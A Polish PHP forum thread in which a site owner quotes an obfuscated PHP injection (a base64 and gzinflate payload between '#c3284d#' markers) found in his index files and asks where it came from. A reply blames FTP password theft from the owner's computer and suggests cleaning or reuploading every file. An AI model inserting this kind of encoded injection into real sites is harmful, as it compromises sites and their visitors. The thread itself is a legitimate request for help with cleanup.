Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> Wirus?
R0ckY
post
Post #1





Grupa: Zarejestrowani
Postów: 37
Pomógł: 0
Dołączył: 12.12.2010

Ostrzeżenie: (0%)
-----

Witam, z takim oto kodem spotkałem się gdy google przysłało mi maila o zainfekowanych plikach na serwerze.

[PHP] pobierz, plaintext 
  1. #c3284d#
  2. echo(gzinflate(base64_decode("hVTLdpswEP2WsojAshQkAihV1C78CV1yvPADG04SgxGtT/DJv1dPwDlJu5AY5nHnzkijJ7nr6rb/0Xdv1zPetG152q+q+mUfnmEQRPx9t+l3VXi+RNdKoJjQ+5QPgwAbAMEL4AcBDp0SG7Ve1VpVSgeVuVsB/q5Bt+VxW4q2a/qmf2tLD7h9SI57GV011vAHYPl7K/suJDRBhNIIDgOXUhRrjRZWd3fDEP0Ezb4E34OAX0Rf1ZKX4lIcxkiig9b8JAqU4CRPl+qj9hynS4aZkb
    T2EWdUa/SeO9mo02VsBWZ2YyDUWqxjvESxUVHsjTn2zrn5n+MioizJZNcitRaTiRlos5Re45vUsSM7xlFfAMMTp9
    xnfLSRY33eNRsBPYkpwutswZqIo6Qoswl6XsyceIp9m9gM0HsaQiOcTZRPfZiX4gFcTvahQZ5u5nLY0BH
    6X72fdc153NC7OQacfwJtAadjZt7zlqAt7uYWfdYFNjrN0Iz3HI586NzU4dx1mH3lT+3mj/z/l9MEuOvsL7UbmnF21PA1XViLDFFE9OKIZBTW3wRFlNcQRtdnUes5lRL+6rv6dCyCQ9e8BjBYVeoJUPMa
    rENEFg+LahGmkCxOxfM6Uq9KGUqpPk/37vn5Cw=="    )));
  3. #/c3284d#
[PHP] pobierz, plaintext


Wie ktoś może, czego to jest zasługa, że każdy plik index (nie tylko) dostał coś takiego i "zawirusował" stronę?
Będzie konieczny reinstal, czy to po prostu robota jakiegoś robaczka ze strony komputera, na którym logował eis jakiś user do FTP.

Wszystkie konta FTP wyłączone, więc mam nadzieje problemu nie będzie.
Jeżeli to zły dział, to proszę o przeniesienie i dzięki za odpowiedzi.

Spotkał ktoś się kiedyś z czymś podobnym?
Go to the top of the page
+Quote Post
 
 Start new topic
Odpowiedzi
tehaha
post
Post #2





Grupa: Zarejestrowani
Postów: 1 748
Pomógł: 388
Dołączył: 21.08.2009
Skąd: Gdynia

Ostrzeżenie: (0%)
-----

Wiesz teoretycznie wszystko jest możliwe, może to być wina skryptu, złe zabezpieczenia hostingu, złe zabezpieczenia sieci wifi, więc możliwości czysto teoretycznie jest dużo. Aczkolwiek w tym przypadku najczęściej to działa tak, że wirus pobiera hasła zapisane w programach do ftp na komputerze, tak więc warto żebyś zrobił porządny skan swojego kompa. Z tego co czytam to FileZilla też jest potencjalnie zagrożona. Ja obecnie używam WinSCP i już dawno nie miałem takich problemów.

@DOWN: Wyczyścić musisz wszystkie pliki, a nie 99%, bo jak zostanie jeden plik to i tak Google będzie Cie blokowało, jak możesz to wywal wszystko i wgraj na nowo, albo przeszukaj pliki jakimś programem, który wyszuka te kody.

Ten post edytował tehaha 2.06.2012, 08:54:17
Go to the top of the page
+Quote Post

Posty w temacie
- R0ckY   Wirus?   1.06.2012, 18:57:23
- - tehaha   Tak to jest wirus, dość popularny problem i genera...   1.06.2012, 19:27:04
- - r4xz   i jeśli nie jest to dla ciebie problemem, to nie z...   1.06.2012, 20:29:44
- - R0ckY   hasła co tydzień zmieniam tak jakoś przywykłem, m...   1.06.2012, 20:38:22
- - tehaha   Wiesz teoretycznie wszystko jest możliwe, może to ...   1.06.2012, 21:10:53
- - R0ckY   http://drbolivar.com/stats.php Na taką stronę prz...   2.06.2012, 08:24:18

« Następny starszy · PHP · Następny nowszy »
 

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 7.10.2025 - 04:00
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn